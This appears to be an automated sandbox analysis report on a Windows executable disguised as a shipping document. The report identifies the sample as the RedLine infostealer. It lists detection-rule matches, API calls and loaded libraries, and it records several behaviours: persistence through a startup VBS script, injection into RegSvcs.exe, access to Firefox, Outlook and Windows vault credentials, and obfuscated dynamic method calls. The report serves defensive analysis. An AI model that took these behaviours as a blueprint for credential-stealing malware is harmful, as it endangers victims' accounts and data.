Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: String function: 00D9F8A0 appears 35 times
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: String function: 00D96AC0 appears 42 times
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: String function: 00D8EC2F appears 68 times
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: String function: 0069EC2F appears 68 times
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: String function: 006A6AC0 appears 42 times
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: String function: 006AF8A0 appears 35 times

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 9.2.juvenile.exe.3c30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.RegSvcs.exe.3fe6458.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.4033190.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.5560000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.2cbf09e.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.5560ee8.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.2cbf09e.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.juvenile.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.3fe5570.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.juvenile.exe.3840000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.2cbff86.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.RegSvcs.exe.5560000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.3fe5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.juvenile.exe.2080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.56f0000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000007.00000002.2303120094.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000002.2202431029.0000000003840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000005.00000002.2322641026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.2175869516.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.2321963047.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@18/8@2/2

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006CCE7A GetLastError,FormatMessageW,

0_2_006CCE7A

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006BAB84 AdjustTokenPrivileges,CloseHandle,	0_2_006BAB84
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_006BB134
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DAAB84 AdjustTokenPrivileges,CloseHandle,	2_2_00DAAB84
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DAB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_00DAB134

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_006CE1FD

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_006C6532

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_006DC18C

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_0068406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0068406B

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

File created: C:\Users\user\AppData\Local\cyclop

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

File created: C:\Users\user\AppData\Local\Temp\aut78D1.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

File read: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Static file information: File size 1199616 > 1048576

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3395906102.00000000030EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: juvenile.exe, 00000002.00000003.2174171140.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000002.00000003.2173530986.0000000003420000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2199863320.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2200019303.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2293946570.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2294278981.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318132849.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318447550.0000000003C80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: juvenile.exe, 00000002.00000003.2174171140.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000002.00000003.2173530986.0000000003420000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2199863320.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2200019303.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2293946570.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2294278981.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318132849.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318447550.0000000003C80000.00000004.00001000.00020000.00000000.sdmp

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
